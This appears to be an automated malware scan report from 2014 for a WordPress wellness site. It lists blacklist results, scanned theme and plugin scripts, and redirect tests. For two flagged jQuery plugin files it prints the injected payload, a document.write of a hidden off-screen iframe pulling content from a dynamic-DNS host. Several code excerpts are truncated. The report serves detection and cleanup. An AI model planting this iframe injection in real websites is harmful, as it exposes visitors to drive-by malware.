Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wellnessnorthtexas.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wellnessnorthtexas.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wellnessnorthtexas.net/ | 200 OK Content-Length: 18258 Content-Type: text/html | clean |
http://wellnessnorthtexas.net/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/shortcodes/js/et_shortcodes_frontend.js?ver=1.6 | 200 OK Content-Length: 8417 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/cufon-yui.js | 200 OK Content-Length: 18442 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/Colaborate-Thin_400.font.js | 200 OK Content-Length: 47140 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/jquery.easing.1.3.js | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/superfish.js | 200 OK Content-Length: 3892 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/js/custom.js | 200 OK Content-Length: 8864 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09 | 200 OK Content-Length: 14416 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e){var c={};c.fileapi=e("<input type='file'/>").get(0).files!==undefined;c.formdata=window.FormData!==undefined;e.fn.ajaxSubmit=function(g){if(!this.length){d("ajaxSubmit: skipping submit process - no element selected");return this}var f,w,i,l=this;if(typeof g=="function"){g={success:g}}f=this.attr("method");w=this.attr("action");i=(typeof w==="string")?e.trim(w):"";i=i||window.location.href||"";if(i){i=(i.match(/^([^#]+)/)||[])[1]}g=e.extend(true,{url:i,success:e.ajaxSettings.su Antivirus reports:
| ||
http://wellnessnorthtexas.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2 | 200 OK Content-Length: 6808 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/page_templates/js/prettyphoto/jquery.prettyPhoto.js?ver=3.0.3 | 200 OK Content-Length: 22373 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/wp-content/themes/Envisioned/epanel/page_templates/js/et-ptemplates-frontend.js?ver=1.1 | 200 OK Content-Length: 4196 Content-Type: text/javascript | clean |
http://wellnessnorthtexas.net/about/ | 200 OK Content-Length: 15739 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:16:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wellnessnorthtexas.net/>; rel=shortlink
X-Pingback: http://wellnessnorthtexas.net/xmlrpc.php
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 08:16:42 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://wellnessnorthtexas.net/>; rel=shortlink
X-Pingback: http://wellnessnorthtexas.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Referer: http://www.google.com/search?q=wellnessnorthtexas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wellnessnorthtexas.net
Referer: http://www.google.com/search?q=wellnessnorthtexas.net
Result:
The result is similar to the first query. There are no suspicious redirects found.